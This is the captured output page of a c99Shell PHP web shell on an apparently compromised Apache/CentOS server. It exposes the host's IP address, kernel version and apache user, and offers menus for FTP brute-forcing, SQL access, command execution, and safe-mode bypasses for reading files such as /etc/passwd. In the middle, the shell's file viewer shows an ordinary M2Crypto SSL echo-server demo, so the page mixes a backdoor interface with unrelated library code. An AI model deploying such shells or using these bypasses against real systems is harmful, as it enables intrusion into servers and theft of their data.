110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /usr/share/doc/m2crypto-0.16/demo/ssl/ drwxr-xr-x Free 50.88 GB of 127.8 GB (39.81%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/usr/share/doc/m2crypto-0.16/demo/ssl/ drwxr-xr-x
Free 50.88 GB of 127.8 GB (39.81%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout


"""Support routines for the various SSL 'echo' servers.

Copyright (c) 1999-2003 Ng Pheng Siong. All rights reserved."""

import SocketServer
from M2Crypto import SSL

def init_context(protocol, certfile, cafile, verify, verify_depth=10):
    ctx = SSL.Context(protocol)
    ctx.load_cert_chain(certfile)
    ctx.load_verify_locations(cafile)
    ctx.set_client_CA_list_from_file(cafile)    
    ctx.set_verify(verify, verify_depth)
    #ctx.set_allow_unknown_ca(1)
    ctx.set_session_id_ctx('echod')
    ctx.set_info_callback()
    return ctx


class ssl_echo_handler(SocketServer.BaseRequestHandler):

    buffer = 'Ye Olde Echo Servre\r\n'

    def handle(self):
        peer = self.request.get_peer_cert()
        if peer is not None:
            print 'Client CA        =', peer.get_issuer().O
            print 'Client Subject   =', peer.get_subject().CN
        x = self.request.write(self.buffer)
        while 1:
            try:
                buf = self.request.read()
                if not buf:
                    break
                self.request.write(buf) 
            except SSL.SSLError, what:
                if str(what) == 'unexpected eof':
                    break
                else:
                    raise

    def finish(self):
        self.request.close()

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Command execute ::
Enter:	Select: